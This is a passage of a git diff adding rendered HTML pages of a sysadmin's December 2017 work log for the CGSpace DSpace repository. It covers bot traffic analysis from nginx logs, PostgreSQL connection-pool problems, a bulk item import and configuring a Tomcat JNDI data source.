  • I will bump DSpace’s db.maxconnections from 60 to 90, and PostgreSQL’s max_connections from 183 to 273 (which is using my loose formula of 90 * webapps + 3)
  • +
  • I really need to figure out how to get DSpace to use a PostgreSQL connection pool
  • +
+
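    +
  • Concretely that works out to 90 × 3 webapps + 3 = 273, and the two settings live in dspace.cfg and postgresql.conf respectively (the paths below are assumptions):
  • +
+
# [dspace]/config/dspace.cfg
+db.maxconnections = 90
+
+# /etc/postgresql/9.5/main/postgresql.conf
+max_connections = 273
+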

2017-11-30

+
    +
  • Linode alerted about high CPU usage on CGSpace again around 6 to 8 AM
  • +
  • Then Uptime Robot said CGSpace was down a few minutes later, but it resolved itself I think (or Tsega restarted Tomcat, I don’t know)
  • +
diff --git a/docs/2017-12/index.html b/docs/2017-12/index.html
new file mode 100644
index 000000000..55e7f6da9
--- /dev/null
+++ b/docs/2017-12/index.html

December, 2017

+ +
+

2017-12-01

+
    +
  • Uptime Robot noticed that CGSpace went down
  • +
  • The logs say “Timeout waiting for idle object”
  • +
  • PostgreSQL activity says there are 115 connections currently
  • +
  • The list of connections to XMLUI and REST API for today:
  • +
+
# cat /var/log/nginx/rest.log  /var/log/nginx/rest.log.1  /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E "1/Dec/2017" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
+    763 2.86.122.76
+    907 207.46.13.94
+   1018 157.55.39.206
+   1021 157.55.39.235
+   1407 66.249.66.70
+   1411 104.196.152.243
+   1503 50.116.102.77
+   1805 66.249.66.90
+   4007 70.32.83.92
+   6061 45.5.184.196
+
    +
  • The number of DSpace sessions isn’t even that high:
  • +
+
$ cat /home/cgspace.cgiar.org/log/dspace.log.2017-12-01 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
+5815
+
    +
  • Connections in the last two hours:
  • +
+
# cat /var/log/nginx/rest.log  /var/log/nginx/rest.log.1  /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E "1/Dec/2017:(09|10)" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail                                                      
+     78 93.160.60.22
+    101 40.77.167.122
+    113 66.249.66.70
+    129 157.55.39.206
+    130 157.55.39.235
+    135 40.77.167.58
+    164 68.180.229.254
+    177 87.100.118.220
+    188 66.249.66.90
+    314 2.86.122.76
+
    +
  • What the fuck is going on?
  • +
  • I’ve never seen this 2.86.122.76 before, it has made quite a few unique Tomcat sessions today:
  • +
+
$ grep 2.86.122.76 /home/cgspace.cgiar.org/log/dspace.log.2017-12-01 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
+822
+
    +
  • Appears to be some new bot:
  • +
+
2.86.122.76 - - [01/Dec/2017:09:02:53 +0000] "GET /handle/10568/78444?show=full HTTP/1.1" 200 29307 "-" "Mozilla/3.0 (compatible; Indy Library)"
+
    +
  • I restarted Tomcat and everything came back up
  • +
  • I can add Indy Library to the Tomcat crawler session manager valve but it would be nice if I could simply remap the user agent in nginx
  • +
  • I will also add ‘Drupal’ to the Tomcat crawler session manager valve because there are Drupals out there harvesting and they should be considered as bots
  • +
+
# cat /var/log/nginx/rest.log  /var/log/nginx/rest.log.1  /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E "1/Dec/2017" | grep Drupal | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
+      3 54.75.205.145
+      6 70.32.83.92
+     14 2a01:7e00::f03c:91ff:fe18:7396
+     46 2001:4b99:1:1:216:3eff:fe2c:dc6c
+    319 2001:4b99:1:1:216:3eff:fe76:205b
+

2017-12-03

+
    +
  • Linode alerted that CGSpace’s load was 327.5% from 6 to 8 AM again
  • +
+

2017-12-04

+
    +
  • Linode alerted that CGSpace’s load was 255.5% from 8 to 10 AM again
  • +
  • I looked at the Munin stats on DSpace Test (linode02) again to see how the PostgreSQL tweaks from a few weeks ago were holding up:
  • +
+

DSpace Test PostgreSQL connections month

+
    +
  • The results look fantastic! So the random_page_cost tweak is massively important for telling the PostgreSQL query planner that random page access costs no more than sequential access, as we’re on an SSD!
  • +
  • I guess we could probably even reduce the number of allowed connections in DSpace and PostgreSQL after this
  • +
  • Run system updates on DSpace Test (linode02) and reboot it
  • +
  • I’m going to enable the PostgreSQL random_page_cost tweak on CGSpace
  • +
  • For reference, here is the past month’s connections:
  • +
+

CGSpace PostgreSQL connections month

+

2017-12-05

+ +

2017-12-06

+
    +
  • Linode alerted again that the CPU usage on CGSpace was high this morning from 6 to 8 AM
  • +
  • Uptime Robot alerted that the server went down and up around 8:53 this morning
  • +
  • Uptime Robot alerted that CGSpace was down and up again a few minutes later
  • +
  • I don’t see any errors in the DSpace logs but I see in nginx’s access.log that UptimeRobot was returned with HTTP 499 status (Client Closed Request)
  • +
  • Looking at the REST API logs I see some new client IP I haven’t noticed before:
  • +
+
# cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 | grep -E "6/Dec/2017" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
+     18 95.108.181.88
+     19 68.180.229.254
+     30 207.46.13.151
+     33 207.46.13.110
+     38 40.77.167.20
+     41 157.55.39.223
+     82 104.196.152.243
+   1529 50.116.102.77
+   4005 70.32.83.92
+   6045 45.5.184.196
+
    +
  • 50.116.102.77 is apparently in the US on websitewelcome.com
  • +
+

2017-12-07

+
    +
  • Uptime Robot reported a few times today that CGSpace was down and then up
  • +
  • At one point Tsega restarted Tomcat
  • +
  • I never got any alerts about high load from Linode though…
  • +
  • I looked just now and see that there are 121 PostgreSQL connections!
  • +
  • The top users right now are:
  • +
+
# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E "7/Dec/2017" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail 
+    838 40.77.167.11
+    939 66.249.66.223
+   1149 66.249.66.206
+   1316 207.46.13.110
+   1322 207.46.13.151
+   1323 2001:da8:203:2224:c912:1106:d94f:9189
+   1414 157.55.39.223
+   2378 104.196.152.243
+   2662 66.249.66.219
+   5110 124.17.34.60
+
    +
  • We’ve never seen 124.17.34.60 yet, but it’s really hammering us!
  • +
  • Apparently it is from China, and here is one of its user agents:
  • +
+
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/7.0; LCTE)
+
    +
  • It is responsible for 4,500 Tomcat sessions today alone:
  • +
+
$ grep 124.17.34.60 /home/cgspace.cgiar.org/log/dspace.log.2017-12-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
+4574
+
    +
  • I’ve adjusted the nginx IP mapping that I set up last month to account for both 124.17.34.60 and 124.17.34.59 using a regex (see the sketch below), as it’s the same bot on the same subnet
  • +
  • I was running the DSpace cleanup task manually and it hit an error:
  • +
+
$ /home/cgspace.cgiar.org/bin/dspace cleanup -v
+...
+Error: ERROR: update or delete on table "bitstream" violates foreign key constraint "bundle_primary_bitstream_id_fkey" on table "bundle"
+  Detail: Key (bitstream_id)=(144666) is still referenced from table "bundle".
+
    +
  • The solution is like I discovered in 2017-04, to set the primary_bitstream_id to null:
  • +
+
dspace=# update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (144666);
+UPDATE 1
+
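    +
  • Going back to the bot mapping, the adjusted regex version of the nginx map might look something like this (a sketch; the exact regex may differ from what is deployed):
  • +
+
map $remote_addr $ua {
+    # 2017-12: same Chinese bot on 124.17.34.59 and 124.17.34.60
+    ~^124\.17\.34\.(59|60)$   'ChineseBot';
+    default                   $http_user_agent;
+}
+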

2017-12-13

+
    +
  • Linode alerted that CGSpace was using high CPU from 10:13 to 12:13 this morning
  • +
+

2017-12-16

+
    +
  • Re-work the XMLUI base theme to allow child themes to override the header logo’s image and link destination: #349
  • +
  • This required a little bit of work to restructure the XSL templates
  • +
  • Optimize PNG and SVG image assets in the CGIAR base theme using pngquant and svgo: #350
  • +
+

2017-12-17

+
    +
  • Reboot DSpace Test to get new Linode Linux kernel
  • +
  • Looking at CCAFS bulk import for Magdalena Haman (she originally sent them in November but some of the thumbnails were missing and dates were messed up so she resent them now)
  • +
  • A few issues with the data and thumbnails: +
      +
    • Her thumbnail files all use capital JPG so I had to rename them to lowercase: rename -fc *.JPG
    • +
    • thumbnail20.jpg is 1.7MB so I have to resize it
    • +
    • I also had to add the .jpg to the thumbnail string in the CSV
    • +
    • The thumbnail11.jpg is missing
    • +
    • The dates are in super long ISO8601 format (from Excel?) like 2016-02-07T00:00:00Z so I converted them to simpler forms in GREL: value.toString("yyyy-MM-dd")
    • +
    • I trimmed the whitespaces in a few fields but it wasn’t many
    • +
    • Rename her thumbnail column to filename, and format it so SAFBuilder adds the files to the thumbnail bundle with this GREL in OpenRefine: value + "__bundle:THUMBNAIL"
    • +
    • Rename dc.identifier.status and dc.identifier.url columns to cg.identifier.status and cg.identifier.url
    • +
    • Item 4 has weird characters in citation, ie: Nagoya et de Trait
    • +
    • Some author names need normalization, ie: Aggarwal, Pramod and Aggarwal, Pramod K.
    • +
    • Something weird going on with duplicate authors that have the same text value, like Berto, Jayson C. and Balmeo, Katherine P.
    • +
    • I will send her feedback on some author names like UNEP and ICRISAT and ask her for the missing thumbnail11.jpg
    • +
    +
  • +
  • I did a test import of the data locally after building with SAFBuilder but for some reason I had to specify the collection (even though the collections were specified in the collection field)
  • +
+
$ JAVA_OPTS="-Xmx512m -Dfile.encoding=UTF-8" ~/dspace/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/89338 --source /Users/aorth/Downloads/2016\ bulk\ upload\ thumbnails/SimpleArchiveFormat --mapfile=/tmp/ccafs.map &> /tmp/ccafs.log
+
    +
  • It’s the same on DSpace Test, I can’t import the SAF bundle without specifying the collection:
  • +
+
$ dspace import --add --eperson=aorth@mjanja.ch --mapfile=/tmp/ccafs.map --source=/tmp/ccafs-2016/SimpleArchiveFormat
+No collections given. Assuming 'collections' file inside item directory
+Adding items from directory: /tmp/ccafs-2016/SimpleArchiveFormat
+Generating mapfile: /tmp/ccafs.map
+Processing collections file: collections
+Adding item from directory item_1
+java.lang.NullPointerException
+        at org.dspace.app.itemimport.ItemImport.addItem(ItemImport.java:865)
+        at org.dspace.app.itemimport.ItemImport.addItems(ItemImport.java:736)
+        at org.dspace.app.itemimport.ItemImport.main(ItemImport.java:498)
+        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
+        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
+        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+        at java.lang.reflect.Method.invoke(Method.java:498)
+        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:226)
+        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:78)
+java.lang.NullPointerException
+Started: 1513521856014
+Ended: 1513521858573
+Elapsed time: 2 secs (2559 msecs)
+
    +
  • I even tried to debug it by adding verbose logging to the JAVA_OPTS:
  • +
+
-Dlog4j.configuration=file:/Users/aorth/dspace/config/log4j-console.properties -Ddspace.log.init.disable=true
+
    +
  • … but the error message was the same, just with more INFO noise around it
  • +
  • For now I’ll import into a collection in DSpace Test but I’m really not sure what’s up with this!
  • +
  • Linode alerted that CGSpace was using high CPU from 4 to 6 PM
  • +
  • The logs for today show the CORE bot (137.108.70.7) being active in XMLUI:
  • +
+
# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E "17/Dec/2017" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
+    671 66.249.66.70
+    885 95.108.181.88
+    904 157.55.39.96
+    923 157.55.39.179
+   1159 207.46.13.107
+   1184 104.196.152.243
+   1230 66.249.66.91
+   1414 68.180.229.254
+   4137 66.249.66.90
+  46401 137.108.70.7
+
    +
  • And then some CIAT bot (45.5.184.196) is actively hitting API endpoints:
  • +
+
# cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E "17/Dec/2017" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
+     33 68.180.229.254
+     48 157.55.39.96
+     51 157.55.39.179
+     56 207.46.13.107
+    102 104.196.152.243
+    102 66.249.66.90
+    691 137.108.70.7
+   1531 50.116.102.77
+   4014 70.32.83.92
+  11030 45.5.184.196
+
    +
  • That’s probably ok, as I don’t think the REST API connections use up a Tomcat session…
  • +
  • CIP emailed a few days ago to ask about unique IDs for authors and organizations, and if we can provide them via an API
  • +
  • Regarding the import issue above it seems to be a known issue that has a patch in DSpace 5.7: + +
  • +
  • We’re on DSpace 5.5 but there is a one-word fix to the addItem() function here: https://github.com/DSpace/DSpace/pull/1731
  • +
  • I will apply it on our branch but I need to make a note to NOT cherry-pick it when I rebase on to the latest 5.x upstream later
  • +
  • Pull request: #351
  • +
+

2017-12-18

+
    +
  • Linode alerted this morning that there was high outbound traffic from 6 to 8 AM
  • +
  • The XMLUI logs show that the CORE bot from last night (137.108.70.7) is very active still:
  • +
+
# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E "18/Dec/2017" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
+    190 207.46.13.146
+    191 197.210.168.174
+    202 86.101.203.216
+    268 157.55.39.134
+    297 66.249.66.91
+    314 213.55.99.121
+    402 66.249.66.90
+    532 68.180.229.254
+    644 104.196.152.243
+  32220 137.108.70.7
+
    +
  • On the API side (REST and OAI) there is still the same CIAT bot (45.5.184.196) from last night making quite a number of requests this morning:
  • +
+
# cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E "18/Dec/2017" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
+      7 104.198.9.108
+      8 185.29.8.111
+      8 40.77.167.176
+      9 66.249.66.91
+      9 68.180.229.254
+     10 157.55.39.134
+     15 66.249.66.90
+     59 104.196.152.243
+   4014 70.32.83.92
+   8619 45.5.184.196
+
    +
  • I need to keep an eye on this issue because it has nice fixes for reducing the number of database connections in DSpace 5.7: https://jira.duraspace.org/browse/DS-3551
  • +
  • Update text on CGSpace about page to give some tips to developers about using the resources more wisely (#352)
  • +
  • Linode alerted that CGSpace was using 396.3% CPU from 12 to 2 PM
  • +
  • The REST and OAI API logs look pretty much the same as earlier this morning, but there’s a new IP harvesting XMLUI:
  • +
+
# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E "18/Dec/2017" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail            
+    360 95.108.181.88
+    477 66.249.66.90
+    526 86.101.203.216
+    691 207.46.13.13
+    698 197.210.168.174
+    819 207.46.13.146
+    878 68.180.229.254
+   1965 104.196.152.243
+  17701 2.86.72.181
+  52532 137.108.70.7
+
    +
  • 2.86.72.181 appears to be from Greece, and has the following user agent:
  • +
+
Mozilla/3.0 (compatible; Indy Library)
+
    +
  • Surprisingly it seems they are re-using their Tomcat session for all those 17,000 requests:
  • +
+
$ grep 2.86.72.181 dspace.log.2017-12-18 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l                                                                                          
+1
+
    +
  • I guess there’s nothing I can do to them for now
  • +
  • In other news, I am curious how many PostgreSQL connection pool errors we’ve had in the last month:
  • +
+
$ grep -c "Cannot get a connection, pool error Timeout waiting for idle object" dspace.log.2017-1* | grep -v :0
+dspace.log.2017-11-07:15695
+dspace.log.2017-11-08:135
+dspace.log.2017-11-17:1298
+dspace.log.2017-11-26:4160
+dspace.log.2017-11-28:107
+dspace.log.2017-11-29:3972
+dspace.log.2017-12-01:1601
+dspace.log.2017-12-02:1274
+dspace.log.2017-12-07:2769
+
    +
  • I made a small fix to my move-collections.sh script so that it handles the case when a “to” or “from” community doesn’t exist
  • +
  • The script lives here: https://gist.github.com/alanorth/e60b530ed4989df0c731afbb0c640515
  • +
  • Major reorganization of four of CTA’s French collections
  • +
  • Basically moving their items into the English ones, then moving the English ones to the top-level of the CTA community, and deleting the old sub-communities
  • +
  • Move collection 10568/51821 from 10568/42212 to 10568/42211
  • +
  • Move collection 10568/51400 from 10568/42214 to 10568/42211
  • +
  • Move collection 10568/56992 from 10568/42216 to 10568/42211
  • +
  • Move collection 10568/42218 from 10568/42217 to 10568/42211
  • +
  • Export CSV of collection 10568/63484 and move items to collection 10568/51400
  • +
  • Export CSV of collection 10568/64403 and move items to collection 10568/56992
  • +
  • Export CSV of collection 10568/56994 and move items to collection 10568/42218
  • +
  • There are blank lines in this metadata, which causes DSpace to not detect changes in the CSVs
  • +
  • I had to use OpenRefine to remove all columns from the CSV except id and collection, and then update the collection field for the new mappings
  • +
  • Remove empty sub-communities: 10568/42212, 10568/42214, 10568/42216, 10568/42217
  • +
  • I was in the middle of applying the metadata imports on CGSpace and the system ran out of PostgreSQL connections…
  • +
  • There were 128 PostgreSQL connections at the time… grrrr.
  • +
  • So I restarted Tomcat 7 and restarted the imports
  • +
  • I assume the PostgreSQL transactions were fine but I will remove the Discovery index for their community and re-run the light-weight indexing to hopefully re-construct everything:
  • +
+
$ dspace index-discovery -r 10568/42211
+$ schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery
+
    +
  • The PostgreSQL issues are getting out of control, I need to figure out how to enable connection pools in Tomcat!
  • +
+

2017-12-19

+
    +
  • Briefly had PostgreSQL connection issues on CGSpace for the millionth time
  • +
  • I’m fucking sick of this!
  • +
  • The connection graph on CGSpace shows shit tons of connections idle
  • +
+

Idle PostgreSQL connections on CGSpace

+
    +
  • And I only now realized that DSpace’s db.maxidle parameter is not in seconds, but the number of idle connections to allow.
  • +
  • So theoretically, because each webapp has its own pool, this could be 20 per app—so no wonder we have 50 idle connections!
  • +
  • I notice that this number will be set to 10 by default in DSpace 6.1 and 7.0: https://jira.duraspace.org/browse/DS-3564
  • +
  • So I’m going to reduce ours from 20 to 10 and start trying to figure out how the hell to supply a database pool using Tomcat JNDI
  • +
  • I re-deployed the 5_x-prod branch on CGSpace, applied all system updates, and restarted the server
  • +
  • Looking through the dspace.log I see this error:
  • +
+
2017-12-19 08:17:15,740 ERROR org.dspace.statistics.SolrLogger @ Error CREATEing SolrCore 'statistics-2010': Unable to create core [statistics-2010] Caused by: Lock obtain timed out: NativeFSLock@/home/cgspace.cgiar.org/solr/statistics-2010/data/index/write.lock
+
    +
  • I don’t have time now to look into this but the Solr sharding has long been an issue!
  • +
  • Looking into using JDBC / JNDI to provide a database pool to DSpace
  • +
  • The DSpace 6.x configuration docs have more notes about setting up the database pool than the 5.x ones (which actually have none!)
  • +
  • First, I uncomment db.jndi in dspace/config/dspace.cfg
  • +
  • Then I create a global Resource in the main Tomcat server.xml (inside GlobalNamingResources):
  • +
+
<Resource name="jdbc/dspace" auth="Container" type="javax.sql.DataSource"
+	  driverClassName="org.postgresql.Driver"
+	  url="jdbc:postgresql://localhost:5432/dspace"
+	  username="dspace"
+	  password="dspace"
+      initialSize='5'
+      maxActive='50'
+      maxIdle='15'
+      minIdle='5'
+      maxWait='5000'
+      validationQuery='SELECT 1'
+      testOnBorrow='true' />
+
    +
  • Then add a ResourceLink in each web application’s context so it can see the global resource:
  • +
+
<ResourceLink global="jdbc/dspace" name="jdbc/dspace" type="javax.sql.DataSource"/>
+
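    +
  • For example, on Ubuntu that context file might look something like this (the file path and docBase are assumptions for illustration):
  • +
+
<!-- e.g. $CATALINA_BASE/conf/Catalina/localhost/xmlui.xml -->
+<Context docBase="/home/cgspace.cgiar.org/webapps/xmlui">
+    <ResourceLink global="jdbc/dspace" name="jdbc/dspace" type="javax.sql.DataSource"/>
+</Context>
+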
    +
  • I am not sure why several guides show configuration snippets for server.xml and web application contexts that use a Local and Global jdbc…
  • +
  • When DSpace can’t find the JNDI context (for whatever reason) you will see this in the dspace logs:
  • +
+
2017-12-19 13:12:08,796 ERROR org.dspace.storage.rdbms.DatabaseManager @ Error retrieving JNDI context: jdbc/dspace
+javax.naming.NameNotFoundException: Name [jdbc/dspace] is not bound in this Context. Unable to find [jdbc].
+        at org.apache.naming.NamingContext.lookup(NamingContext.java:825)
+        at org.apache.naming.NamingContext.lookup(NamingContext.java:173)
+        at org.dspace.storage.rdbms.DatabaseManager.initDataSource(DatabaseManager.java:1414)
+        at org.dspace.storage.rdbms.DatabaseManager.initialize(DatabaseManager.java:1331)
+        at org.dspace.storage.rdbms.DatabaseManager.getDataSource(DatabaseManager.java:648)
+        at org.dspace.storage.rdbms.DatabaseManager.getConnection(DatabaseManager.java:627)
+        at org.dspace.core.Context.init(Context.java:121)
+        at org.dspace.core.Context.<init>(Context.java:95)
+        at org.dspace.app.util.AbstractDSpaceWebapp.register(AbstractDSpaceWebapp.java:79)
+        at org.dspace.app.util.DSpaceContextListener.contextInitialized(DSpaceContextListener.java:128)
+        at org.apache.catalina.core.StandardContext.listenerStart(StandardContext.java:5110)
+        at org.apache.catalina.core.StandardContext.startInternal(StandardContext.java:5633)
+        at org.apache.catalina.util.LifecycleBase.start(LifecycleBase.java:145)
+        at org.apache.catalina.core.ContainerBase.addChildInternal(ContainerBase.java:1015)
+        at org.apache.catalina.core.ContainerBase.addChild(ContainerBase.java:991)
+        at org.apache.catalina.core.StandardHost.addChild(StandardHost.java:652)
+        at org.apache.catalina.startup.HostConfig.deployDescriptor(HostConfig.java:712)
+        at org.apache.catalina.startup.HostConfig$DeployDescriptor.run(HostConfig.java:2002)
+        at java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:511)
+        at java.util.concurrent.FutureTask.run(FutureTask.java:266)
+        at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
+        at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
+        at java.lang.Thread.run(Thread.java:748)
+2017-12-19 13:12:08,798 INFO  org.dspace.storage.rdbms.DatabaseManager @ Unable to locate JNDI dataSource: jdbc/dspace
+2017-12-19 13:12:08,798 INFO  org.dspace.storage.rdbms.DatabaseManager @ Falling back to creating own Database pool
+
    +
  • And indeed the Catalina logs show that it failed to set up the JDBC driver:
  • +
+
org.apache.tomcat.dbcp.dbcp.SQLNestedException: Cannot load JDBC driver class 'org.postgresql.Driver'
+
    +
  • There are several copies of the PostgreSQL driver installed by DSpace:
  • +
+
$ find ~/dspace/ -iname "postgresql*jdbc*.jar"
+/Users/aorth/dspace/webapps/jspui/WEB-INF/lib/postgresql-9.1-901-1.jdbc4.jar
+/Users/aorth/dspace/webapps/oai/WEB-INF/lib/postgresql-9.1-901-1.jdbc4.jar
+/Users/aorth/dspace/webapps/xmlui/WEB-INF/lib/postgresql-9.1-901-1.jdbc4.jar
+/Users/aorth/dspace/webapps/rest/WEB-INF/lib/postgresql-9.1-901-1.jdbc4.jar
+/Users/aorth/dspace/lib/postgresql-9.1-901-1.jdbc4.jar
+
    +
  • These apparently come from the main DSpace pom.xml:
  • +
+
<dependency>
+   <groupId>postgresql</groupId>
+   <artifactId>postgresql</artifactId>
+   <version>9.1-901-1.jdbc4</version>
+</dependency>
+
    +
  • So WTF? Let’s try copying one to Tomcat’s lib folder and restarting Tomcat:
  • +
+
$ cp ~/dspace/lib/postgresql-9.1-901-1.jdbc4.jar /usr/local/opt/tomcat@7/libexec/lib
+
    +
  • Oh that’s fantastic, now at least Tomcat doesn’t print an error during startup so I guess it succeeds to create the JNDI pool
  • +
  • DSpace starts up but I have no idea if it’s using the JNDI configuration because I see this in the logs:
  • +
+
2017-12-19 13:26:54,271 INFO  org.dspace.storage.rdbms.DatabaseManager @ DBMS is '{}'PostgreSQL
+2017-12-19 13:26:54,277 INFO  org.dspace.storage.rdbms.DatabaseManager @ DBMS driver version is '{}'9.5.10
+2017-12-19 13:26:54,293 INFO  org.dspace.storage.rdbms.DatabaseUtils @ Loading Flyway DB migrations from: filesystem:/Users/aorth/dspace/etc/postgres, classpath:org.dspace.storage.rdbms.sqlmigration.postgres, classpath:org.dspace.storage.rdbms.migration
+2017-12-19 13:26:54,306 INFO  org.flywaydb.core.internal.dbsupport.DbSupportFactory @ Database: jdbc:postgresql://localhost:5432/dspacetest (PostgreSQL 9.5)
+
    +
  • Let’s try again, but this time explicitly blank the PostgreSQL connection parameters in dspace.cfg and see if DSpace starts…
  • +
  • Wow, ok, that works, but having to copy the PostgreSQL JDBC JAR to Tomcat’s lib folder totally blows
  • +
  • Also, it’s likely this is only a problem on my local macOS + Tomcat test environment
  • +
  • Ubuntu’s Tomcat distribution will probably handle this differently
  • +
  • So for reference I have: +
      +
    • a <Resource> defined globally in server.xml
    • +
    • a <ResourceLink> defined in each web application’s context XML
    • +
    • unset the db.url, db.username, and db.password parameters in dspace.cfg
    • +
    • set the db.jndi in dspace.cfg to the name specified in the web application context
    • +
    +
  • +
  • After adding the Resource to server.xml on Ubuntu I get this in Catalina’s logs:
  • +
+
SEVERE: Unable to create initial connections of pool.
+java.sql.SQLException: org.postgresql.Driver
+...
+Caused by: java.lang.ClassNotFoundException: org.postgresql.Driver
+
    +
  • The username and password are correct, but maybe I need to copy the fucking lib there too?
  • +
  • I tried installing Ubuntu’s libpostgresql-jdbc-java package but Tomcat still can’t find the class
  • +
  • Let me try to symlink the lib into Tomcat’s libs:
  • +
+
# ln -sv /usr/share/java/postgresql.jar /usr/share/tomcat7/lib
+
    +
  • Now Tomcat starts but the localhost container has errors:
  • +
+
SEVERE: Exception sending context initialized event to listener instance of class org.dspace.app.util.DSpaceContextListener
+java.lang.AbstractMethodError: Method org/postgresql/jdbc3/Jdbc3ResultSet.isClosed()Z is abstract
+
    +
  • Could be a version issue or something since the Ubuntu package provides 9.2 and DSpace’s are 9.1…
  • +
  • Let me try to remove it and copy in DSpace’s:
  • +
+
# rm /usr/share/tomcat7/lib/postgresql.jar
+# cp [dspace]/webapps/xmlui/WEB-INF/lib/postgresql-9.1-901-1.jdbc4.jar /usr/share/tomcat7/lib/
+
    +
  • Wow, I think that actually works…
  • +
  • I wonder if I could get the JDBC driver from postgresql.org instead of relying on the one from the DSpace build: https://jdbc.postgresql.org/
  • +
  • I notice our version is 9.1-901, which isn’t even available anymore! The latest in the archived versions is 9.1-903
  • +
  • Also, since I commented out all the db parameters in DSpace.cfg, how does the command line dspace tool work?
  • +
  • Let’s try the upstream JDBC driver first:
  • +
+
# rm /usr/share/tomcat7/lib/postgresql-9.1-901-1.jdbc4.jar
+# wget https://jdbc.postgresql.org/download/postgresql-42.1.4.jar -O /usr/share/tomcat7/lib/postgresql-42.1.4.jar
+
    +
  • DSpace command line fails unless db settings are present in dspace.cfg:
  • +
+
$ dspace database info
+Caught exception:
+java.sql.SQLException: java.lang.ClassNotFoundException: 
+        at org.dspace.storage.rdbms.DataSourceInit.getDatasource(DataSourceInit.java:171)
+        at org.dspace.storage.rdbms.DatabaseManager.initDataSource(DatabaseManager.java:1438)
+        at org.dspace.storage.rdbms.DatabaseUtils.main(DatabaseUtils.java:81)
+        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
+        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
+        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+        at java.lang.reflect.Method.invoke(Method.java:498)
+        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:226)
+        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:78)
+Caused by: java.lang.ClassNotFoundException: 
+        at java.lang.Class.forName0(Native Method)
+        at java.lang.Class.forName(Class.java:264)
+        at org.dspace.storage.rdbms.DataSourceInit.getDatasource(DataSourceInit.java:41)
+        ... 8 more
+
    +
  • And in the logs:
  • +
+
2017-12-19 18:26:56,971 ERROR org.dspace.storage.rdbms.DatabaseManager @ Error retrieving JNDI context: jdbc/dspace
+javax.naming.NoInitialContextException: Need to specify class name in environment or system property, or as an applet parameter, or in an application resource file:  java.naming.factory.initial
+        at javax.naming.spi.NamingManager.getInitialContext(NamingManager.java:662)
+        at javax.naming.InitialContext.getDefaultInitCtx(InitialContext.java:313)
+        at javax.naming.InitialContext.getURLOrDefaultInitCtx(InitialContext.java:350)
+        at javax.naming.InitialContext.lookup(InitialContext.java:417)
+        at org.dspace.storage.rdbms.DatabaseManager.initDataSource(DatabaseManager.java:1413)
+        at org.dspace.storage.rdbms.DatabaseUtils.main(DatabaseUtils.java:81)
+        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
+        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
+        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+        at java.lang.reflect.Method.invoke(Method.java:498)
+        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:226)
+        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:78)
+2017-12-19 18:26:56,983 INFO  org.dspace.storage.rdbms.DatabaseManager @ Unable to locate JNDI dataSource: jdbc/dspace
+2017-12-19 18:26:56,983 INFO  org.dspace.storage.rdbms.DatabaseManager @ Falling back to creating own Database pool
+2017-12-19 18:26:56,992 WARN  org.dspace.core.ConfigurationManager @ Warning: Number format error in property: db.maxconnections
+2017-12-19 18:26:56,992 WARN  org.dspace.core.ConfigurationManager @ Warning: Number format error in property: db.maxwait
